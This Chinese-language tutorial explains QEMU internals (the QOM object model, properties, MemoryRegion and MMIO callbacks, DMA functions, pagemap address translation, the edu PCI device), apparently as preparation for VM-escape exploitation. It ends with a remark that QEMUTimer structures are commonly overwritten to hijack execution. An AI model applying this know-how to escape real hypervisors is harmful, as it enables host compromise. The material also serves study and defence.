1 2 3 4 5 6 7 8 9 10 device_init_func | dev = qdev_device_add(opts, errp); | | dev = DEVICE(object_new(driver)); | | | TypeImpl *ti = type_get_by_name(typename); | | | object_new_with_type(ti); | | | | obj = g_malloc(type->instance_size); | | | | object_initialize_with_type(obj, type->instance_size, type); | | | | | object_init_with_type(obj, type); | | | | | object_post_init_with_type(obj, type); | | object_property_set_bool(OBJECT(dev), true , "realized" , &err);
object_initialize_with_type 的主要工作是对 object_init_with_type 和 object_post_init_with_type 进行调用,前者通过递归调用所有父类型的对象初始化函数和自身对象的初始化函数,后者调用 TypeImpl 的 instance_post_init 回调成员完成对象初始化之后的工作。下面以 edu 的 TypeInfo 为例进行介绍。
edu 的对象大小(instance_size)为 sizeof(EduState),所以实际上一个 edu 类型的对象是 EduState 结构体,每一个对象都会有一个 XXXState 与之对应,记录了该对象的相关信息,若 edu 是一个 PCI 设备,那么 EduState 里面就会有这个设备的一些信息,如中断信息、设备状态、使用的 MMIO 和 PIO 对应的内存区域等。 在 object_init_with_type 函数中可以看到调用的参数都是一个 Object 。可以看出,对象之间实际也是有一种父对象与子对象的关系存在。与类型一样,QOM 中的对象也可以使用宏将一个指向 Object 对象的指针转换成一个指向子类对象的指针。转换过程与类型 ObjectClass 类似。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 struct Object { ObjectClass *class ; ObjectFree *free ; GHashTable *properties; uint32_t ref; Object *parent; }; struct DeviceState { Object parent_obj; }; struct PCIDevice { DeviceState qdev; }; typedef struct { PCIDevice pdev; } EduState;
这里可以看出,不同于类型信息和类型,object 是根据需要创建的,只有在命令行指定了设备或者是热插一个设备之后才会有 object 的创建。类型和对象之间是通过 Object 的 class 域联系在一起的。这是在 object_initialize_with_type 函数中通过 obj->class=type->class 实现的。
从上文可以看出,可以把 QOM 的对象构造分成 3 部分:
第一部分是类型的构造,通过 TypeInfo 构造一个 TypeImpl 的哈希表,这是在 main 之前完成的;
第二部分是类型的初始化,这是在 main 中进行的,这两部分都是全局的,也就是只要编译进去的 QOM 对象都会调用;
第三部分是类对象的构造,这是构造具体的对象实例,只有在命令行指定了对应的设备时,才会创建对象。
现在只是构造出了对象,并且调用了对象初始化函数,但是 EduState 里面的数据内容并没有填充,这个时候的 edu 设备状态并不是可用的,对设备而言还需要设置它的 realized 属性为 true 才行。在 qdev_device_add 函数的后面,还有这样一句:
1 object_property_set_bool(OBJECT(dev), true , "realized" , &err);
这句代码将 dev(也就是 edu 设备的 realized 属性)设置为 true ,这就涉及了 QOM 类和对象的另一个方面,即属性。
QOM 中的属性 在 QOM 中为了便于对对象进行管理,还给每种类型以及对象增加了属性。类属性存在于 ObjectClass 的 properties 域中,这个域是在类型初始化函数 type_initialize 中构造的。对象属性存放在 Object 的 properties 域中,这个域是在对象的初始化函数 object_initialize_with_type 中构造的。两者皆为一个哈希表,存着属性名字到 ObjectProperty 的映射。
属性由 ObjectProperty 表示。
1 2 3 4 5 6 7 8 9 10 11 12 13 struct ObjectProperty { gchar *name; gchar *type; gchar *description; ObjectPropertyAccessor *get; ObjectPropertyAccessor *set ; ObjectPropertyResolve *resolve; ObjectPropertyRelease *release; ObjectPropertyInit *init; void *opaque; QObject *defval; };
其中,name 表示名字;type 表示属性的类型,如有的属性是字符串,有的是 bool 类型,有的是 link 等其他更复杂的类型;get 、set 、resolve 等回调函数则是对属性进行操作的函数;opaque 指向一个具体的属性,如 BoolProperty 等。
每一种具体的属性都会有一个结构体来描述它。比如下面的 ·LinkProperty 表示 link 类型的属性,StringProperty 表示字符串类型的属性,BoolProperty 表示 bool 类型的属性。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 typedef struct { union { Object **targetp; Object *target; ptrdiff_t offset; }; void (*check)(const Object *, const char *, Object *, Error **); ObjectPropertyLinkFlags flags; } LinkProperty; typedef struct StringProperty { char *(*get)(Object *, Error **); void (*set )(Object *, const char *, Error **); } StringProperty; typedef struct BoolProperty { bool (*get)(Object *, Error **); void (*set )(Object *, bool , Error **); } BoolProperty;
以 Object 为例,属性相关结构如下:
属性的添加分为类属性的添加和对象属性的添加,以对象属性为例,它的属性添加是通过 object_property_add 接口完成的。段忽略了属性 name 中带有通配符 * 的情况,该函数内容如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ObjectProperty * object_property_add (Object *obj, const char *name, const char *type, ObjectPropertyAccessor *get, ObjectPropertyAccessor *set , ObjectPropertyRelease *release, void *opaque, Error **errp) { ObjectProperty *prop; size_t name_len = strlen (name); if (object_property_find(obj, name, NULL ) != NULL ) { error_setg(errp, "attempt to add duplicate property '%s' to object (type '%s')" , name, object_get_typename(obj)); return NULL ; } prop = g_malloc0(sizeof (*prop)); prop->name = g_strdup(name); prop->type = g_strdup(type); prop->get = get; prop->set = set ; prop->release = release; prop->opaque = opaque; g_hash_table_insert(obj->properties, prop->name, prop); return prop; }
object_property_add 函数首先调用 object_property_find 来确认所插入的属性是否已经存在,确保不会添加重复的属性,接着分配一个 ObjectProperty 结构并使用参数进行初始化,然后调用 g_hash_table_insert 插入到对象的 properties 域中。
属性的查找通过 object_property_find 函数实现,代码如下。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ObjectProperty *object_class_property_find (ObjectClass *klass, const char *name, Error **errp) { ObjectProperty *prop; ObjectClass *parent_klass; parent_klass = object_class_get_parent(klass); if (parent_klass) { prop = object_class_property_find(parent_klass, name, NULL ); if (prop) { return prop; } } prop = g_hash_table_lookup(klass->properties, name); if (!prop) { error_setg(errp, "Property '.%s' not found" , name); } return prop; }
这个函数首先调用 object_class_property_find 来确认自己所属的类以及所有父类都不存在这个属性,然后在自己的 properties 域中查找。
属性的设置是通过 object_property_set 来完成的,其只是简单地调用 ObjectProperty 的 set 函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 void object_property_set (Object *obj, Visitor *v, const char *name, Error **errp) { ObjectProperty *prop = object_property_find(obj, name, errp); if (prop == NULL ) { return ; } if (!prop->set ) { error_setg(errp, QERR_PERMISSION_DENIED); } else { prop->set (obj, v, name, prop->opaque, errp); } }
每一种属性类型都有自己的 set 函数,其名称为 property_set_XXX ,其中的 XXX 表示属性类型,如 bool、str、link 等。以 bool 为例,其 set 函数如下。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 static void property_set_bool (Object *obj, Visitor *v, const char *name, void *opaque, Error **errp) { BoolProperty *prop = opaque; bool value; Error *local_err = NULL ; visit_type_bool(v, name, &value, &local_err); if (local_err) { error_propagate(errp, local_err); return ; } prop->set (obj, value, errp); }
可以看到,其调用了具体属性(BoolProperty)的 set 函数,这是在创建这个属性的时候指定的。
QEMU 内存虚拟化 QEMU 内存结构 MemoryRegion 抽象了 一个地址空间中的一段范围 ,既可以是可读写的 RAM ,也可以是由回调实现的 MMIO ,还可以是I/O 端口空间的桥接 、别名(Alias) 、IOMMU 入口 、只读 ROM/ROMD ,或者纯容器(Container/Root) 。它们共同组成 无环图(DAG) 的内存映射视图,最终被“扁平化”成 AddressSpace 的映射供 CPU/设备访问。
该结构体定义于 include/exec/memory.h 当中:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 struct MemoryRegion { Object parent_obj; bool romd_mode; bool ram; bool subpage; bool readonly; bool nonvolatile; bool rom_device; bool flush_coalesced_mmio; bool global_locking; uint8_t dirty_log_mask; bool is_iommu; RAMBlock *ram_block; Object *owner; const MemoryRegionOps *ops; void *opaque; MemoryRegion *container; Int128 size; hwaddr addr; void (*destructor)(MemoryRegion *mr); uint64_t align; bool terminates; bool ram_device; bool enabled; bool warning_printed; uint8_t vga_logging_count; MemoryRegion *alias; hwaddr alias_offset; int32_t priority; QTAILQ_HEAD(, MemoryRegion) subregions; QTAILQ_ENTRY(MemoryRegion) subregions_link; QTAILQ_HEAD(, CoalescedMemoryRange) coalesced; const char *name; unsigned ioeventfd_nb; MemoryRegionIoeventfd *ioeventfds; };
MemoryRegion 的成员函数被封装在函数表 MemoryRegionOps 当中:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 struct MemoryRegionOps { uint64_t (*read)(void *opaque, hwaddr addr, unsigned size); void (*write)(void *opaque, hwaddr addr, uint64_t data, unsigned size); MemTxResult (*read_with_attrs)(void *opaque, hwaddr addr, uint64_t *data, unsigned size, MemTxAttrs attrs); MemTxResult (*write_with_attrs)(void *opaque, hwaddr addr, uint64_t data, unsigned size, MemTxAttrs attrs); enum device_endian endianness ; struct { unsigned min_access_size; unsigned max_access_size; bool unaligned; bool (*accepts)(void *opaque, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs); } valid; struct { unsigned min_access_size; unsigned max_access_size; bool unaligned; } impl; };
MemoryRegionOps 中的 read、write 回调函数只有在命中 IO 型区域(MMIO/ROM‑device/PMIO) 时才会调用,否则直接直接对宿主内存读写。
1 2 3 4 5 6 7 Guest CPU 访存 │ ▼ AddressSpace(地址簿) │ 查表定位 ├──► MemoryRegion = RAM/ROM ──► 直接读/写宿主内存 └──► MemoryRegion = IO(设备) ─► 调用 ops.read / ops.write(你的设备代码)
IO 型内存注册 memory_region_init_io memory_region_init_io() 初始化 一个 MemoryRegion,并不会“挂到总线”或“映射给来宾”。真正对外可见还要交给 pci_register_bar() 或 memory_region_add_subregion() 等去“导出”。
1 2 3 4 5 6 7 void memory_region_init_io (MemoryRegion *mr, Object *owner, const MemoryRegionOps *ops, void *opaque, const char *name, uint64_t size) ;
返回值 :void(无返回值)
参数含义 :
mr:你要初始化的 MemoryRegion 实例(通常是设备状态结构里的一个成员)。
owner:QOM 拥有者,一般传 OBJECT(dev) 或 OBJECT(&s->pdev.qdev),用于生命周期管理/可视化。
ops:回调表,定义了读写函数等属性:
1 2 3 4 5 6 typedef struct MemoryRegionOps { uint64_t (*read)(void *opaque, hwaddr addr, unsigned size); void (*write)(void *opaque, hwaddr addr, uint64_t data, unsigned size); enum device_endian endianness ; } MemoryRegionOps;
opaque:回调里透传给你(设备实例指针,常传 s)。
name:调试/监控友好的区域名(如 "strng-mmio")。
size:区域大小(字节)。QEMU 会用它做边界检查 ,超出范围的访问不会进入你的 ops。
pci_register_bar 把 memory 绑定到设备配置空间的 BARregion_num;当来宾写 BAR 寄存器确定映射地址后,访问将由 QEMU 转发到 ops->read/write。边界由 memory->size 保证 ,越界访问不会进入回调。
1 2 3 4 5 void pci_register_bar (PCIDevice *dev, int region_num, uint8_t type, MemoryRegion *memory) ;
返回值 :void(无返回值)
参数含义 :
dev:PCIDevice*,你的 PCI 设备实例(通常是 &s->pdev)。
region_num:BAR 编号,0..5(普通设备最多 6 个 BAR;ROM 另算)。
type:BAR 类型/标志的组合:
PCI_BASE_ADDRESS_SPACE_MEMORY = 0x00(内存映射 MMIO)
PCI_BASE_ADDRESS_SPACE_IO = 0x01(I/O 端口 PMIO)
可与以下标志 OR 用(用于 memory BAR):
PCI_BASE_ADDRESS_MEM_TYPE_64(64 位 BAR,会消耗连续两个 BAR 槽)
PCI_BASE_ADDRESS_MEM_PREFETCH(可预取)
memory:已经 memory_region_init_io() 好的 MemoryRegion。注册后,来宾对该 BAR 对应的地址空间访问会路由到 memory 的 ops。
IO 型内存读写 下面这两个原型就是 QEMU MemoryRegionOps 里“IO 类型内存”(也就是设备的 MMIO/PIO BAR)的访问回调,用来响应来 自客体 CPU 的一次总线事务(bus transaction):
1 2 uint64_t (*read)(void *opaque, hwaddr addr, unsigned size);void (*write)(void *opaque, hwaddr addr, uint64_t data, unsigned size);
opaque 你在 memory_region_init_io(..., &ops, opaque, ...) 里传入的设备状态指针,一般是你的 DeviceState/PCIDevice 的私有结构指针。回调里先把它强转回你的设备结构,然后读写寄存器/状态。
addr(类型 hwaddr) 访问的偏移 ,相对于该 MemoryRegion 的起始地址(也就是相对于 BAR 的起点)。不是系统物理地址。hwaddr 是面向“客体地址宽度”的无符号整型,足以容纳 64 位偏移。
size(单位:字节) 本次访问的宽度:1、2、4、8 之一(具体允许哪些,由你的 MemoryRegionOps 的“可接受/实现的访问宽度”设定决定;不支持的宽度,QEMU 会拆成更小的多次调用,或直接拒绝访问,取决于你的配置)。
data(仅写回调) 要写入的值,其有效位仅在低 size * 8 位。你在写入设备寄存器时应据此掩码并对齐。
read 的返回值 读取到的数据,用 低 size * 8 位 承载。不要做符号扩展。对齐/字节序由 MemoryRegionOps 的 endianness 和访问宽度共同决定。
小结:一次 CPU 对设备寄存器的 load/store → QEMU 解析后调用你的 read/write,你依据 addr/size 在寄存器空间里取/改值并返回/完成。
内存操作函数 AddressSpace 通用读写 1 2 3 4 5 6 7 8 9 MemTxResult address_space_read (AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, size_t len) ;MemTxResult address_space_write (AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, size_t len) ;MemTxResult address_space_rw (AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, size_t len, bool is_write) ;
参数说明
as:要访问的地址空间 。常见有:
系统物理内存(system memory)的 AddressSpace(例如 &address_space_memory);
I/O 地址空间;
经过 IOMMU 翻译后的 DMA AddressSpace (比如为某个总线/设备创建的 DMA AS)。
addr:在该 AddressSpace 内的起始物理地址/IO 地址 。
attrs:事务属性 (MemTxAttrs),通常写 MEMTXATTRS_UNSPECIFIED。它会随访问传递,供内存监听器、IOMMU 等子系统解读(比如是否可被合并、缓存属性、发起者信息等,具体随目标体系结构/设备而定)。
buf / len:读/写的用户缓冲区与长度;读时把目标内容拷贝到 buf,写时从 buf 拷贝到目标。
is_write:仅对 address_space_rw(),true=写,false=读。
返回值(错误处理)
返回 MemTxResult:成功 为“OK”(不同版本的枚举名略有差别,但你可以把“非 OK”都当错误处理),失败表示访问异常、解码失败(地址无映射/被拒)、或设备侧报错。
实践建议:判是否为 OK ,错误时在设备里置位 DMA 错误、触发中断或按设备规范处理。
使用场景
你已经知道 要访问哪个 AddressSpace(例如已拿到“某设备的 DMA 地址空间”),并希望以统一 API 发起读/写。
dma_memory_read / dma_memory_write(设备发起 DMA 时优先用)1 2 3 4 5 6 7 8 9 int dma_memory_read (AddressSpace *as, dma_addr_t addr, void *buf, dma_addr_t len) ;int dma_memory_write (AddressSpace *as, dma_addr_t addr, const void *buf, dma_addr_t len) ;MemTxResult dma_memory_read_with_attrs (AddressSpace *as, dma_addr_t addr, void *buf, dma_addr_t len, MemTxAttrs attrs) ;MemTxResult dma_memory_write_with_attrs (AddressSpace *as, dma_addr_t addr, const void *buf, dma_addr_t len, MemTxAttrs attrs) ;
参数说明
as:DMA 使用的 AddressSpace 。若系统存在 IOMMU,请确保这里传的是IOMMU 后的 DMA AS (否则就绕过了 IOMMU,不符合真实硬件)。
addr:DMA 地址 (设备视角下的地址)。
buf / len:同上。
attrs:同上;大多数设备用 MEMTXATTRS_UNSPECIFIED 就好。
返回值
简化版返回 int(0 成功,<0 失败);*_with_attrs 返回 MemTxResult。
DMA(Direct Memory Access,直接内存访问) 是指外设 (比如网卡/存储/显卡/PCIe 设备)绕过 CPU ,直接在来宾的内存地址空间里读/写数据 的一种机制。
在 QEMU 设备模型里,“设备做 DMA”= 你的设备代码主动去读/写 Guest(或经 IOMMU 翻译后的 I/O 虚拟地址,IOVA)里的缓冲区。
CPU 访存 :Guest 的 CPU 执行指令触发访存(load/store),QEMU 根据地址落到 RAM 或 MMIO;MMIO 会调用你的 MemoryRegionOps.read/write 回调。
DMA 访存 :设备本身 发起内存传输(比如把网卡收到的数据写到来宾内存中的 ring buffer),在 QEMU 里表现为设备模型主动调用 dma_memory_read/write(或 pci_dma_read/write)。
PCI 专用:pci_dma_read / pci_dma_write 这两个函数用于PCI 设备发起 DMA :从设备视角用 IOVA/DMA 地址 去读/写来宾内存的数据。它们会根据 dev 自动选择正确的 DMA AddressSpace (考虑 IOMMU/ATS 等),比你自己拿 AddressSpace 更不容易出错。
1 2 int pci_dma_read (PCIDevice *dev, dma_addr_t addr, void *buf, dma_addr_t len) ;int pci_dma_write (PCIDevice *dev, dma_addr_t addr, const void *buf, dma_addr_t len) ;
参数说明
dev: 发起 DMA 的 PCIDevice *(你的设备对象)。
addr: dma_addr_t,设备看到的 DMA 地址 (通常是 IOVA;没有 IOMMU 时等同于来宾物理地址)。
buf: 主机侧缓冲区指针。
pci_dma_read:输出缓冲 (把来宾内存读到这里)。
pci_dma_write:输入缓冲 (把这里的数据写到来宾内存)。
len: 传输字节数(dma_addr_t 类型以便支持 64 位长度)。
返回值
0:整段传输 成功 (等价于底层 MemTxResult == MEMTX_OK)。
非 0(通常为 -1) :传输失败 (底层不是 MEMTX_OK)。
不保证设置 errno;不要 依赖 errno。
失败原因可能是:IOMMU 翻译失败/权限拒绝、地址未映射(解码失败)、目标 MemoryRegion 报错、越界等。
没有“部分成功”的返回 :要么成功完成 len 字节,要么失败(如果你需要部分长度语义,就改用 address_space_map/unmap 循环搬运,或把大块拆小分段重试)。
特点
会基于 dev 选择正确的 DMA AddressSpace (考虑 IOMMU/ATS 等),避免你手动找 AS 出错。
语义与 dma_memory_* 等价,但更贴近“PCI 设备发起 DMA”的常见场景。
另外有的版本的 QEMU 还会提供带 MemTxResult 属性的 pci_dma_* 函数。
1 2 3 4 5 MemTxResult pci_dma_read_with_attrs (PCIDevice *dev, dma_addr_t addr, void *buf, dma_addr_t len, MemTxAttrs attrs) ;MemTxResult pci_dma_write_with_attrs (PCIDevice *dev, dma_addr_t addr, const void *buf, dma_addr_t len, MemTxAttrs attrs) ;
对于这种形式的 API,返回值:
cpu_physical_memory_*cpu_physical_memory_* 是 QEMU 的“上帝视角”直接访问来宾“系统物理内存地址空间” (system_memory)的工具函数。
它们不经过 IOMMU 、不做设备权限检查 、也不触发设备的 MMIO 回调 。
典型用途:monitor/调试/固件加载/快照工具 等“宿主侧主动”对 Guest 物理内存做读写。
不要 用它们在设备模型 里模拟 DMA/寄存器访问(会偏离真实硬件路径)。
1 2 3 4 5 6 void cpu_physical_memory_read (hwaddr addr, void *buf, size_t len) ;void cpu_physical_memory_write (hwaddr addr, const void *buf, size_t len) ;void cpu_physical_memory_rw (hwaddr addr, void *buf, size_t len, int is_write) ;void *cpu_physical_memory_map (hwaddr addr, hwaddr *plen, int is_write) ;void cpu_physical_memory_unmap (void *host_ptr, hwaddr len, int is_write, hwaddr access_len) ;
参数说明
addr: hwaddr 目标来宾物理地址 (system_memory 的物理地址,不是 IOVA,不是虚拟地址)。
buf: void* / const void* 主机侧缓冲区指针。read/rw(is_write=0) 为输出 缓冲,write/rw(is_write=1) 为输入 缓冲。
len: size_t 读/写的字节数 。可以很大,函数内部会自动跨页/跨 region 逐段处理。
is_write: int(仅 rw)0=读,非 0=写。
返回/错误行为
这些函数没有返回值 ,不会把错误以返回码形式告诉你。
当访问到未映射/被拒绝的区域时,不同版本/路径一般会:
读 :把对应字节视作 0 (复制 0 到 buf 的那段);
写 :丢弃 那部分写入(相当于没写成功)。
因此用于调试/加载 没问题,但 不要 拿它判断“访问是否真的成功”,也不要用来模拟设备行为。
内存地址转换 Linux 在用户态 (有高权限)可以用 /proc/<pid>/pagemap 获取内存地址(虚拟地址) 对应的物理地址 。
Linux 提供 pagemap 接口,可把某进程的虚拟页 映射到页帧号 PFN ,再算出物理地址:
物理地址 = PFN × 页大小 + 页内偏移 。
自 Linux 4.0 起,未授予 CAP_SYS_ADMIN 时 PFN 会被屏蔽/置零 (防范 Rowhammer 等攻击,4.0–4.1 未授权直接 open 失败,4.2+ 则 PFN 字段置零),因此要么用 root、要么给程序授予该能力,否则得不到 PFN。
pagemap 64 位项的位义(简化)如下:
bit63=present,
bit62=swapped,
bits 0–54 为 PFN(在 present 时有效)
内存地址(虚拟地址) 转换物理地址 的具体步骤为:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #include <stdint.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <errno.h> static uint64_t virt_to_phys (void *vaddr) { long pagesize = sysconf(_SC_PAGESIZE); uint64_t va = (uint64_t )vaddr; uint64_t page_index = va / pagesize; uint64_t offset = page_index * sizeof (uint64_t ); int fd = open("/proc/self/pagemap" , O_RDONLY); if (fd < 0 ) return 0 ; uint64_t entry = 0 ; ssize_t n = pread(fd, &entry, sizeof (entry), offset); close(fd); if (n != sizeof (entry)) return 0 ; if (!(entry & (1ULL << 63 )) || (entry & (1ULL << 62 ))) { errno = EFAULT; return 0 ; } uint64_t pfn = entry & ((1ULL << 55 ) - 1 ); return (pfn * pagesize) + (va % pagesize); }
确保页已驻留 (否则 present=0):触碰一次该地址或用 mlock() 将其锁入内存。
打开 /proc/self/pagemap(或 /proc/<pid>/pagemap),按“页索引×8 ”偏移读取一个 64 位条目;偏移和读大小必须是 8 的倍数。
检查 bit63(present)。若不在内存或 bit62(swapped)为 1,就无法得到当前物理地址。
取 PFN(条目低 55 位)。
计算物理地址:phys = (PFN << PAGE_SHIFT) | (va & (page_size-1))。
mmap 本身不会立即分配物理页 ,Linux 默认按需分配(首次访问触发缺页才真正拿到物理页)。因此直接 mmap 分配的匿名页通过 /proc/self/pagemap 查询不到对应的物理地址。
mmap 时加 MAP_POPULATE(“预触发”) 对于可写的、私有、匿名映射 (典型组合:MAP_PRIVATE|MAP_ANONYMOUS + PROT_READ|PROT_WRITE),Linux 在处理 MAP_POPULATE 时,会走“写缺页 ”的预触发路径,把每一页都像被写过一样 提前 fault 进来,从而为每一页分配匿名物理页 。
1 2 3 #include <sys/mman.h> void *p = mmap(NULL , len, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1 , 0 );
QEMU 设备分析 PCI 设备 设备实例定义 首先是设备的 State 结构体,该结构体即设备的 Object 中自身的部分,包含了设备自身定义的全部相关结构。关于设备的操作都是围绕这个结构体展开的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 #define TYPE_PCI_EDU_DEVICE "edu" #define EDU(obj) OBJECT_CHECK(EduState, obj, TYPE_PCI_EDU_DEVICE) #define FACT_IRQ 0x00000001 #define DMA_IRQ 0x00000100 #define DMA_START 0x40000 #define DMA_SIZE 4096 typedef struct { PCIDevice pdev; MemoryRegion mmio; QemuThread thread; QemuMutex thr_mutex; QemuCond thr_cond; bool stopping; uint32_t addr4; uint32_t fact; #define EDU_STATUS_COMPUTING 0x01 #define EDU_STATUS_IRQFACT 0x80 uint32_t status; uint32_t irq_status; #define EDU_DMA_RUN 0x1 #define EDU_DMA_DIR(cmd) (((cmd) & 0x2) >> 1) # define EDU_DMA_FROM_PCI 0 # define EDU_DMA_TO_PCI 1 #define EDU_DMA_IRQ 0x4 struct dma_state { dma_addr_t src; dma_addr_t dst; dma_addr_t cnt; dma_addr_t cmd; } dma; QEMUTimer dma_timer; char dma_buf[DMA_SIZE]; uint64_t dma_mask; } EduState;
设备类型定义 其次是设备的 TypeInfo ,重点关注其中的 instance_init,class_init等初始化函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static void pci_edu_register_types (void ) { static InterfaceInfo interfaces[] = { { INTERFACE_CONVENTIONAL_PCI_DEVICE }, { }, }; static const TypeInfo edu_info = { .name = TYPE_PCI_EDU_DEVICE, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (EduState), .instance_init = edu_instance_init, .class_init = edu_class_init, .interfaces = interfaces, }; type_register_static(&edu_info); } type_init(pci_edu_register_types)
instance_size 告诉 QOM:创建这个对象时需要分配多大的一块内存(也就是 EduState 的大小)。
class_init 在类级别 设置默认回调(例如把 PCIDeviceClass::realize 指到 pci_edu_realize)。
instance_init 在实例级别 设字段默认值、注册 QOM 属性等(必须不失败)。
当你在命令行 -device edu 或在代码里新增这个设备时,QEMU 会:
分配一块大小为 sizeof(EduState) 的零清内存;
构造父类子对象(因为 EduState 的第一个成员是 PCIDevice pdev;,这就是“内嵌继承”);
调用 edu_instance_init() 给实例字段设缺省值、注册属性(如 dma_mask)。
设备初始化操作 从设备的 class_init 和 instance_init 等初始化函数中我们可以获取到设备的相关信息。其中 realize 和 exit 函数定义了一部分 Object 初始化和销毁操作。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 static void edu_instance_init (Object *obj) { EduState *edu = EDU(obj); edu->dma_mask = (1UL << 28 ) - 1 ; object_property_add_uint64_ptr(obj, "dma_mask" , &edu->dma_mask, OBJ_PROP_FLAG_READWRITE, NULL ); } static void edu_class_init (ObjectClass *class, void *data) { DeviceClass *dc = DEVICE_CLASS(class); PCIDeviceClass *k = PCI_DEVICE_CLASS(class); k->realize = pci_edu_realize; k->exit = pci_edu_uninit; k->vendor_id = PCI_VENDOR_ID_QEMU; k->device_id = 0x11e8 ; k->revision = 0x10 ; k->class_id = PCI_CLASS_OTHERS; set_bit(DEVICE_CATEGORY_MISC, dc->categories); }
realize 和 exit 函数定义的是对象初始化和销毁中可能会失败的操作。
class_init(类初始化,ObjectClass 级) :设定类的默认虚函数/回调 (比如把 DeviceClass::realize 指向你的实现),不触碰实例数据。对象尚未出现。
设定/覆盖虚函数:dc->realize、dc->unrealize、desc、user_creatable 等。
静态属性数组(device_class_set_props() 给 DeviceClass.props_)。
instance_init(实例初始化,Object 实例级,必须不失败) :新建对象后,给实例字段设默认值、创建子对象的“壳”(object_initialize)、注册 QOM 属性 等;不能失败 。此时不 把设备接到总线,也不 占用全局资源。
设实例缺省值;
用 object_property_add*() 注册 QOM 属性 (这样 --device xyz,help/device-list-properties 才看得到/可设置);
通过 object_initialize() 创建子对象的壳 (注意:不是在这里 realize 子对象)。
realize(实现,可以失败) :把实例接入系统 :校验用户已设置的属性、在总线上登记、映射 BAR/MMIO、连 IRQ、申请可能失败的资源;可以失败 ,需通过 errp 报错。可选的 unrealize 负责撤销。
依据属性 做校验;
接总线 、分配并注册 BAR/MMIO/PIO、连 IRQ、把子对象逐个 realize;
申请任何可能失败的外部资源;必要时通过 Error **errp 返回错误。
设备内存的注册多出现在 realize 函数中,例如 edu 中的 memory_region_init_io 和 pci_register_bar 注册了一块 MMIO 类型的内存。我们需要重点关注 MemoryRegionOps 结构体 edu_mmio_ops 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 static void pci_edu_realize (PCIDevice *pdev, Error **errp) { EduState *edu = EDU(pdev); uint8_t *pci_conf = pdev->config; pci_config_set_interrupt_pin(pci_conf, 1 ); if (msi_init(pdev, 0 , 1 , true , false , errp)) { return ; } timer_init_ms(&edu->dma_timer, QEMU_CLOCK_VIRTUAL, edu_dma_timer, edu); qemu_mutex_init(&edu->thr_mutex); qemu_cond_init(&edu->thr_cond); qemu_thread_create(&edu->thread, "edu" , edu_fact_thread, edu, QEMU_THREAD_JOINABLE); memory_region_init_io(&edu->mmio, OBJECT(edu), &edu_mmio_ops, edu, "edu-mmio" , 1 * MiB); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &edu->mmio); } static void pci_edu_uninit (PCIDevice *pdev) { EduState *edu = EDU(pdev); qemu_mutex_lock(&edu->thr_mutex); edu->stopping = true ; qemu_mutex_unlock(&edu->thr_mutex); qemu_cond_signal(&edu->thr_cond); qemu_thread_join(&edu->thread); qemu_cond_destroy(&edu->thr_cond); qemu_mutex_destroy(&edu->thr_mutex); timer_del(&edu->dma_timer); msi_uninit(pdev); }
edu_mmio_ops 结构体定义如下,可以看到 edu 设备自定义的读写函数 edu_mmio_read 和 edu_mmio_write 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 static const MemoryRegionOps edu_mmio_ops = { .read = edu_mmio_read, .write = edu_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, .valid = { .min_access_size = 4 , .max_access_size = 8 , }, .impl = { .min_access_size = 4 , .max_access_size = 8 , }, };
QEMUTimer QEMUTimer 是 QEMU 事件循环里的软件定时器对象 :挂在某个 QEMUClock 上,按指定“时钟”的时间线到点就回调你的处理函数,用来驱动设备里的超时、周期性中断等逻辑。
QEMU 有四条时间线,你创建定时器时要选其一:realtime(宿主墙钟)、host(宿主单调时钟)、virtual(只在 guest 运行时前进)、virtual_rt(按 guest 速度走但用于客体外模块)。做设备建模一般用 virtual,因为它会在 VM 暂停/断点时一起停,从而保持确定性。
简单来说 QEMUTimer = “挂在某条 QEMUClock 时间线上的回调闹钟” 。设备模型里写寄存器→计算到期点→timer_mod()→到点发 IRQ/做 DMA,就是它的日常工作流。
由于 QEMUTimer 会定期回调一些指针结构,因此在 QEMU 逃逸中我们通常选择通过修改 QEMUTimer 相关结构来劫持程序执行流。
QEMUTimer 相关结构 相关函数和结构如下:
